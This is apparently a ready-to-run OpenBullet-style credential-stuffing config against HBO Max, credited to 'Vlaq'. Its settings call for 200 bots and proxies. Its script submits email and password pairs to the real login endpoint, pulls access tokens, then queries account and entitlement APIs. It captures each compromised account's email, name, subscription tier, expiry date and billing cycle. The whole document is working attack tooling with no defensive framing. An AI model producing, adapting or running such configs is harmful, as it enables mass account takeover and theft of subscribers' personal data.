[SETTINGS]
{
  "Name": "HBO Max + Capture",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2025-08-18 00:44:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Vlaq",
  "Version": "1.0",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "MaxTimeout": 60,
  "MaxRetries": 0,
  "CustomInputs": [],
  "Settings": [
    {
      "Name": "USERAGENT",
      "Type": "Text",
      "Value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
    }
  ]
}

[SCRIPT]

// HBO Max Authentication - Multi-step flow discovered through network monitoring
// Step 1: Credential submission (form-based authentication to establish session)
REQUEST POST "https://auth.hbomax.com/login"
  HEADER "User-Agent: <USERAGENT>"
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Content-Type: application/x-www-form-urlencoded"
  HEADER "Origin: https://auth.hbomax.com"
  HEADER "Referer: https://auth.hbomax.com/login"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Upgrade-Insecure-Requests: 1"
  HEADER "Sec-Fetch-Dest: document"
  HEADER "Sec-Fetch-Mode: navigate"
  HEADER "Sec-Fetch-Site: same-origin"
  HEADER "Sec-Fetch-User: ?1"
  DATA "email=<USER>&password=<PASS>"

// Step 2: Establish session context (required before token request)
REQUEST GET "https://default.any-any.prd.api.hbomax.com/session-context/headwaiter/v1/bootstrap"
  HEADER "User-Agent: <USERAGENT>"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Origin: https://play.hbomax.com"
  HEADER "Referer: https://play.hbomax.com/"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: cross-site"

// Step 3: Get authentication token (now with proper request context)
REQUEST GET "https://default.any-any.prd.api.hbomax.com/token?realm=bolt"
  HEADER "User-Agent: <USERAGENT>"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Origin: https://play.hbomax.com"
  HEADER "Referer: https://play.hbomax.com/"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: cross-site"

PARSE "<SOURCE>" JSON "access_token" "access_token"
PARSE "<SOURCE>" JSON "refresh_token" "refresh_token"
PARSE "<SOURCE>" JSON "expires_in" "expires_in"

REQUEST GET "https://default.beam-amer.prd.api.hbomax.com/users/me"
  HEADER "User-Agent: <USERAGENT>"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Authorization: Bearer <access_token>"
  HEADER "Origin: https://play.hbomax.com"
  HEADER "Referer: https://play.hbomax.com/"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: cross-site"

PARSE "<SOURCE>" JSON "user_id" "id"
PARSE "<SOURCE>" JSON "email" "email"
PARSE "<SOURCE>" JSON "first_name" "firstName"
PARSE "<SOURCE>" JSON "last_name" "lastName"

REQUEST GET "https://default.any-any.prd.api.hbomax.com/entitlements/userEntitlementsSummary/me"
  HEADER "User-Agent: <USERAGENT>"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Authorization: Bearer <access_token>"
  HEADER "Origin: https://play.hbomax.com"
  HEADER "Referer: https://play.hbomax.com/"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: cross-site"

PARSE "<SOURCE>" JSON "subscription_status" "status"
PARSE "<SOURCE>" JSON "subscription_tier" "tier"
PARSE "<SOURCE>" JSON "expiry_date" "expiryDate"
PARSE "<SOURCE>" JSON "billing_cycle" "billingCycle"

CAP "User ID: " "<user_id>"
CAP "Email: " "<email>"
CAP "Name: " "<first_name> <last_name>"
CAP "Subscription Status: " "<subscription_status>"
CAP "Subscription Tier: " "<subscription_tier>"
CAP "Expiry Date: " "<expiry_date>"
CAP "Billing Cycle: " "<billing_cycle>"
